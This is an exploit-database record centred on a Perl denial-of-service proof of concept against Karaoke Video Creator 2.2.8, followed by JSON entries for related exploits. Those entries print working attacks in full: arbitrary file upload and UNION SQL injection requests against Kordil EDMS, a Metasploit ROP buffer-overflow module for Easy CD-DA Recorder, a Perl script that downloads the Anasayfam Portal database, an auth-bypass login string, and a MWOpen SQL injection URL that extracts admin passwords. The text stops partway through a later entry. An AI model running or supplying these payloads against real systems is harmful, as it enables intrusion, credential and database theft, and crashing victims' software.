ID 1337DAY-ID-13763 Type zdt Reporter PASSEWORD Modified 2010-08-20T00:00:00
Description
Exploit for windows platform in category dos / poc
=======================================
Karaoke Video Creator Denial of Service
=======================================
# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability
# Author: PASSEWORD
# Date: 2010-08-20
# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php
# Version : 2.2.8
# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers
# Tested on: Windows XP SP3 Fr
$buff="A" x 10000;
open (myfile , ">>PASS.PK2");
print myfile $buff;
close (myfile);
# 0day.today [2018-01-05] #
{"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:31:28", "bulletin": {"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.6, "modified": "2016-04-19T03:31:28"}}, "hash": "70853e0b5285a33ad73d4155b75a67ebf96b6016e01780e3b356015393858a0c", "description": "Exploit for windows platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-19T03:31:28", "edition": 1, "title": "Karaoke Video Creator Denial of Service", "href": "http://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e6cd35bea631ebac8305f4a6985b28b2", "key": "sourceHref"}, {"hash": "7b15c3af60d44c5118dd1c7eb4179a1f", "key": "sourceData"}, {"hash": "058e04dde4ada0593b014d9fd2376fc0", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category dos / poc", "hash": "4f0596794256b2c340ffd2810ffa81b7a38a5bfa8dd75608a46114514356bf50", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:31643", "EDB-ID:13761", "EDB-ID:13760", "EDB-ID:13763"]}, {"type": "zdt", "idList": ["1337DAY-ID-21889", "1337DAY-ID-13760", "1337DAY-ID-4436", "1337DAY-ID-2343", "1337DAY-ID-878"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF"]}, {"type": "cve", "idList": ["CVE-2010-2343"]}], "modified": "2018-01-05T21:16:30"}, "vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-01-05T21:16:30", "edition": 2, "title": "Karaoke Video Creator Denial of Service", "href": "https://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2018-01-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "4c10a308279666eece1d08b00f824a86", "key": "href"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d9c5aa94b36b40b02a0a04189bb14af0", "key": "sourceData"}, {"hash": "02c658aed57f40a41959761d93070678", "key": "sourceHref"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-11-19T19:11:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-11-16T00:00:00", "published": "2018-11-16T00:00:00", "id": "1337DAY-ID-31643", "href": "https://0day.today/exploit/description/31643", "title": "Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://www.kordil.net/\r\n# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe\r\n# Version: 2.2.60rc3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# Users...\r\n# 1) \r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\nPOST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=\r\n---------------------------114917121519378418451544589507\r\nContent-Length: 973\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd1\"\r\nadmin\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd2\"\r\nEfe\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd3\"\r\n2018-11-13 15:04:48\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"upload_fd4\"; filename=\"phpinfo.php\"\r\nContent-Type: application/force-download\r\n<?php\r\nphpinfo();\r\n?>\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd5\"\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"act\"\r\nn\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"QS_Submit\"\r\nAdd\r\n-----------------------------114917121519378418451544589507--\r\nHTTP/1.1 302 Found\r\nDate: Tue, 13 Nov 2018 12:15:22 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./routine_emails_to_all_users.php?\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n \r\nGET /PATH/email_attachment/admin-13.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/[PATH]/routine_emails_to_all_users.php?\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:15:30 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\n# http://localhost/[PATH]/email_attachment//[FILE]\r\n# \r\n<html>\r\n<body>\r\n<form name=\"qs_add_form\" method=\"post\" action=\"http://localhost/[PATH]/routine_emails_to_all_users_add.php\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"add_fd1\" value=\"admin\">\r\n<input type=\"text\" name=\"add_fd2\" value=\"Efe\">\r\n<input type=\"hidden\" name=\"add_fd3\" value=\" 2018-11-13 15:04:48\">\r\n<input type=\"file\" name=\"upload_fd4\" id=\"File\">\r\n<input type=\"text\" name=\"add_fd5\" value=\"\" hidden=\"true\">\r\n<input type=\"hidden\" name=\"act\" value=\"n\">\r\n<input type=\"submit\" name=\"QS_Submit\" value=\"Add\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:21:09 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 4)\r\n# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:22:49 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=97\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31643"}, {"lastseen": "2018-02-10T11:36:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "1337DAY-ID-21889", "href": "https://0day.today/exploit/description/21889", "type": "zdt", "title": "Easy CD-DA Recorder PLS Buffer Overflow Exploit", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n \r\n end\r\n \r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n \r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n \r\n def exploit\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n \r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n \r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n \r\n end\r\nend\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21889"}, {"lastseen": "2018-02-06T07:06:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13761", "href": "https://0day.today/exploit/description/13761", "type": "zdt", "title": "Anasayfam Portal 2010 Remote Database Disclosure Exploit", "sourceData": "========================================================\r\nAnasayfam Portal 2010 Remote Database Disclosure Exploit\r\n========================================================\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# Anasayfam Portal 2010 / Database Disclosure Exploit\r\n#\r\n# Coded: BARCOD3\r\n# \r\n#\r\n#\r\n#\r\n# Thanks: DaiMon, KnocKout, NeT-Excellans all Logystics.\r\n#\r\n \r\n \r\n \r\nuse LWP::Simple;\r\nuse LWP::UserAgent;\r\n\r\nsystem('cls');\r\nsystem('title Anasayfam Portal 2010 Remote Database Disclosure Exploit');\r\nsystem('color 4');\r\n\r\n\r\nif(@ARGV < 2)\r\n{\r\nprint \"[-]Example Exp.\\n\\n\";\r\n&help; exit();\r\n}\r\nsub help()\r\n{\r\nprint \"[+] usage1 : perl $0 site.com /path/ \\n\";\r\nprint \"[+] usage2 : perl $0 localhost / \\n\";\r\n}\r\n\r\nprint \"\\n************************************************************************\\n\";\r\nprint \"\\* Anasayfam 2010 Remote Database Disclosure Exploit *\\n\";\r\nprint \"\\* auth0r : BARCOD3 *\\n\";\r\nprint \"\\* contact : ozk4nbozkurt[at]hotmail[dot]com *\\n\";\r\nprint \"\\* Special thx. DaiMon, KnocKout, NeT-Excellans all Logystics. *\\n\";\r\nprint \"\\*********************************************************************\\n\\n\\n\";\r\n\r\n($TargetIP, $path, $File,) = @ARGV;\r\n\r\n$File=\"db/anasayfam.mdb\";\r\nmy $url = \"http://\" . $TargetIP . $path . $File;\r\nprint \"\\n wait!!! \\n\\n\";\r\n\r\nmy $useragent = LWP::UserAgent->new();\r\nmy $request = $useragent->get($url,\":content_file\" => \"C:/anasayfam.mdb\");\r\n\r\nif ($request->is_success)\r\n{\r\nprint \"[+] $url Exploited!\\n\\n\";\r\nprint \"[+] Database saved to C:/anasayfam.mdb\\n\";\r\nexit();\r\n}\r\nelse\r\n{\r\nprint \"[!] Dur la dur sakin ol $url olmadi bu !\\n[!] \".$request->status_line.\"\\n\";\r\nexit();\r\n}\r\n\r\n\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13761"}, {"lastseen": "2018-01-02T05:14:52", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13760", "href": "https://0day.today/exploit/description/13760", "type": "zdt", "title": "clipbucket 2.0.8.366 By Pass Vulnerability", "sourceData": "==========================================\r\nclipbucket 2.0.8.366 By Pass Vulnerability\r\n==========================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ####################################### 1\r\n0 I'm indoushka member from Inj3ct0r Team 1\r\n1 ####################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n######################################################################## \r\n\r\n# Vendor: www.Clip-Bucket.com\r\n\r\n# Date: 2010-05-27 \r\n\r\n# Author : indoushka \r\n\r\n# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! \r\n\r\n# Contact : 00213771818860\r\n\r\n# Home : www.sec4ever.net\r\n\r\n# Bug : By Pass\r\n\r\n# Tested on : windows SP2 Francais V.(Pnx2 2.0) \r\n######################################################################## \r\n \r\n# Exploit By indoushka \r\n\r\n1 - http://127.0.0.1/clip/admin_area/styles/cbv2/layout/\r\n\r\n_permission.html\r\nadd_group.html\r\nadd_members.html\r\nadd_phrase.html\r\nads_add_placements.html\r\nads_manager.html\r\nedit_group.html\r\neditor_pick.html\r\nflagged_groups.html\r\nflagged_users.html\r\nflagged_videos.html\r\ngroup_category.html\r\ngroups_manager.html\r\nheader.html\r\nleft_menu.html\r\nlogin.html\r\nmass_uploader.html\r\nmembers.html\r\nmsg.html\r\nplugin_manager.html\r\nreports.html\r\ntemplate_editor.html\r\ntemplates.html\r\nunder_development.html\r\nuser_category.html\r\nuser_levels.html\r\nview_conversion_log.html\r\nbody.html\r\nfooter.html\r\nmanage_pages.html\r\nedit_announcemnent.html\r\ncomments.html\r\nmass_email.html\r\ncb_mod_check.html\r\ncb_conversion_queue.html\r\nmanage_players.html\r\nindex.html\r\nview_user.html\r\nglobal_header.html\r\nreindex_cb.html\r\nlanguage_settings.html\r\nmain.html\r\nemail_settings.html\r\nvideo_manager.html\r\ncategory.html\r\nupload_thumbs.html\r\nview_video.html\r\nedit_video.html\r\n\r\nDz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================\r\nspecial thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller \r\nSid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net \r\nMR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te \r\n---------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13760"}, {"lastseen": "2018-03-28T07:14:53", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-12-14T00:00:00", "published": "2008-12-14T00:00:00", "id": "1337DAY-ID-4436", "href": "https://0day.today/exploit/description/4436", "type": "zdt", "title": "FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability ", "sourceData": "=================================================================\r\nFlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability \r\n=================================================================\r\n\r\n\r\n[START]\r\n\r\n#########################################################################################\r\n[0x01] Informations:\r\n\r\nScript : FlexPHPNews PRO 0.0.6\r\nScript\t : FlexPHPNews 0.0.6\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro]\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6]\r\nVulnerability : Sql Injection (Auth bypass)\r\nAuthor : Osirys\r\nNotes : Proud to be Italian\r\nGreets: : XaDoS, x0r, emgent, Jay\r\n\r\n#########################################################################################\r\n[0x02] Bug:[Sql Injection (Auth bypass)]\r\n######\r\n\r\nBugged file is: /[path]/admin/usercheck.php\r\n\r\n[CODE]\r\n\r\nif (!empty($logincheck)){\r\n$sql = \"select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'\";\r\n$results = $db->select($sql);\r\n\r\n[/CODE]\r\n\r\n\r\n[!] EXPLOIT DETAILS:\r\n\r\n [1] Go to /[path]/admin/index.php\r\n [2] Put as username and password the following sql code: ' or '1=1\r\n [3] You are the admin now, bypass succesfull =)\r\n\r\n#########################################################################################\r\n\r\n[/END]\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4436"}, {"lastseen": "2018-02-07T01:30:07", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-12-06T00:00:00", "published": "2007-12-06T00:00:00", "id": "1337DAY-ID-2343", "href": "https://0day.today/exploit/description/2343", "type": "zdt", "title": "MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection", "sourceData": "=========================================================\r\nMWOpen E-Commerce leggi_commenti.asp Remote SQL Injection\r\n=========================================================\r\n\r\n\r\n\r\n---------------------------------------------------------------\r\n ____ __________ __ ____ __ \r\n/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \r\n | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\\r\n | | | \\ | |/ \\ \\___| | /_____/ | || | \r\n |___|___| /\\__| /______ /\\___ >__| |___||__| \r\n \\/\\______| \\/ \\/ \r\n\r\n---------------------------------------------------------------\r\n\r\nMWOpen E-Commerce All Versions \"leggi_commenti.asp\" SQL Injection\r\n\r\n---------------------------------------------------------------\r\n\r\n#By KiNgOfThEwOrLd\t\t\t\t\r\n\r\n---------------------------------------------------------------\r\n\r\nPoC:\r\n\r\nNothing to say..\r\n\r\nCorrupted Page: \r\n\r\nleggi_commenti.asp\r\n\r\nCorrupted Variabile: \r\n\r\n?id=\r\n\r\nExploit:\r\n\r\nhttp://[target]/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null,\r\nnull,password,nome,null,data,null+from+utenti+where+Admin=true\r\n\r\n---------------------------------------------------------------\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2343"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "href": "https://packetstormsecurity.com/files/125195/Easy-CD-DA-Recorder-PLS-Buffer-Overflow.html", "id": "PACKETSTORM:125195", "type": "packetstorm", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 